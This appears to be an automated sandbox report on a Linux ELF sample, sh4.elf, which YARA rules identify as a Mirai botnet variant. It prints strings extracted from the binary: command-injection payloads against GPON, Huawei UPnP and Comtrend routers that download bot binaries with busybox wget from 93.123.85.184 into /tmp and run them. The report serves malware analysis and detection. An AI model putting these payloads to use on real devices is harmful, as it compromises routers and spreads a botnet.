Click to jump to signature section
Source: sh4.elf | ReversingLabs: Detection: 63% |
Source: /tmp/sh4.elf (PID: 5530) | Socket: 127.0.0.1:39148 | Jump to behavior |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic | DNS traffic detected: DNS query: daisy.ubuntu.com |
Source: sh4.elf | String found in binary or memory: http://93.123.85.184/Yboats.arm7;chmod |
Source: sh4.elf | String found in binary or memory: http://93.123.85.184/Yboats.mips |
Source: sh4.elf | String found in binary or memory: http://93.123.85.184/Yboats.mips; |
Source: sh4.elf | String found in binary or memory: http://93.123.85.184/Yboats.mpsl;chmod |
Source: sh4.elf | String found in binary or memory: http://93.123.85.184/Yboats.x86 |
Source: sh4.elf | String found in binary or memory: http://93.123.85.184/adb; |
Source: sh4.elf | String found in binary or memory: http://93.123.85.184/comtrend%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114 |
Source: sh4.elf | String found in binary or memory: http://93.123.85.184/gpon443 |
Source: sh4.elf | String found in binary or memory: http://purenetworks.com/HNAP1/ |
Source: sh4.elf | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: sh4.elf | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/ |
Source: sh4.elf, type: SAMPLE | Matched rule: Detects ELF Mirai variant Author: Florian Roth |
Source: 5532.1.00007fa344400000.00007fa34441c000.r-x.sdmp, type: MEMORY | Matched rule: Detects ELF Mirai variant Author: Florian Roth |
Source: 5534.1.00007fa344400000.00007fa34441c000.r-x.sdmp, type: MEMORY | Matched rule: Detects ELF Mirai variant Author: Florian Roth |
Source: 5530.1.00007fa344400000.00007fa34441c000.r-x.sdmp, type: MEMORY | Matched rule: Detects ELF Mirai variant Author: Florian Roth |
Source: Initial sample | String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://93.123.85.184/gpon443+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0 |
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.184 -l /tmp/.ybot -r Yboats.mips; /bin/busybox chmod 777 * /tmp/.ybot; /tmp/.ybot huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: Initial sample | String containing 'busybox' found: /bin/busybox |
Source: Initial sample | String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://93.123.85.184/gpon443+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0POST /HNAP1/ HTTP/1.0 |
Source: Initial sample | String containing 'busybox' found: var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/SofiasshdbashhttpdtelnetddropbearropbearencodersystemYbot/root/dvr_gui//root/dvr_app//anko-app//opt/, |
Source: ELF static info symbol of initial sample | .symtab present: no |
Source: sh4.elf, type: SAMPLE | Matched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research |
Source: 5532.1.00007fa344400000.00007fa34441c000.r-x.sdmp, type: MEMORY | Matched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research |
Source: 5534.1.00007fa344400000.00007fa34441c000.r-x.sdmp, type: MEMORY | Matched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research |
Source: 5530.1.00007fa344400000.00007fa34441c000.r-x.sdmp, type: MEMORY | Matched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research |
Source: classification engine | Classification label: mal100.troj.evad.linELF@0/0@2/0 |
Source: /tmp/sh4.elf (PID: 5530) | File: /tmp/sh4.elf | Jump to behavior |
Source: /tmp/sh4.elf (PID: 5530) | Queries kernel information via 'uname': | Jump to behavior |
Source: sh4.elf, 5530.1.00007fffc3ee5000.00007fffc3f06000.rw-.sdmp, sh4.elf, 5532.1.00007fffc3ee5000.00007fffc3f06000.rw-.sdmp, sh4.elf, 5534.1.00007fffc3ee5000.00007fffc3f06000.rw-.sdmp | Binary or memory string: /usr/bin/qemu-sh4 |
Source: sh4.elf, 5530.1.000055b4aae38000.000055b4aae9b000.rw-.sdmp, sh4.elf, 5532.1.000055b4aae38000.000055b4aae9b000.rw-.sdmp, sh4.elf, 5534.1.000055b4aae38000.000055b4aae9b000.rw-.sdmp | Binary or memory string: U5!/etc/qemu-binfmt/sh4 |
Source: sh4.elf, 5530.1.000055b4aae38000.000055b4aae9b000.rw-.sdmp, sh4.elf, 5532.1.000055b4aae38000.000055b4aae9b000.rw-.sdmp, sh4.elf, 5534.1.000055b4aae38000.000055b4aae9b000.rw-.sdmp | Binary or memory string: /etc/qemu-binfmt/sh4 |
Source: sh4.elf, 5530.1.00007fffc3ee5000.00007fffc3f06000.rw-.sdmp, sh4.elf, 5532.1.00007fffc3ee5000.00007fffc3f06000.rw-.sdmp, sh4.elf, 5534.1.00007fffc3ee5000.00007fffc3f06000.rw-.sdmp | Binary or memory string: Ux86_64/usr/bin/qemu-sh4/tmp/sh4.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/sh4.elf |
Source: sh4.elf, 5532.1.00007fffc3ee5000.00007fffc3f06000.rw-.sdmp | Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped |
Source: Yara match | File source: sh4.elf, type: SAMPLE |
Source: Yara match | File source: 5532.1.00007fa344400000.00007fa34441c000.r-x.sdmp, type: MEMORY |
Source: Yara match | File source: 5534.1.00007fa344400000.00007fa34441c000.r-x.sdmp, type: MEMORY |
Source: Yara match | File source: 5530.1.00007fa344400000.00007fa34441c000.r-x.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: sh4.elf PID: 5530, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: sh4.elf PID: 5532, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: sh4.elf PID: 5534, type: MEMORYSTR |
Source: Yara match | File source: sh4.elf, type: SAMPLE |
Source: Yara match | File source: 5532.1.00007fa344400000.00007fa34441c000.r-x.sdmp, type: MEMORY |
Source: Yara match | File source: 5534.1.00007fa344400000.00007fa34441c000.r-x.sdmp, type: MEMORY |
Source: Yara match | File source: 5530.1.00007fa344400000.00007fa34441c000.r-x.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: sh4.elf PID: 5530, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: sh4.elf PID: 5532, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: sh4.elf PID: 5534, type: MEMORYSTR |
Source: Yara match | File source: sh4.elf, type: SAMPLE |
Source: Yara match | File source: 5532.1.00007fa344400000.00007fa34441c000.r-x.sdmp, type: MEMORY |
Source: Yara match | File source: 5534.1.00007fa344400000.00007fa34441c000.r-x.sdmp, type: MEMORY |
Source: Yara match | File source: 5530.1.00007fa344400000.00007fa34441c000.r-x.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: sh4.elf PID: 5530, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: sh4.elf PID: 5532, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: sh4.elf PID: 5534, type: MEMORYSTR |
Source: Yara match | File source: sh4.elf, type: SAMPLE |
Source: Yara match | File source: 5532.1.00007fa344400000.00007fa34441c000.r-x.sdmp, type: MEMORY |
Source: Yara match | File source: 5534.1.00007fa344400000.00007fa34441c000.r-x.sdmp, type: MEMORY |
Source: Yara match | File source: 5530.1.00007fa344400000.00007fa34441c000.r-x.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: sh4.elf PID: 5530, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: sh4.elf PID: 5532, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: sh4.elf PID: 5534, type: MEMORYSTR |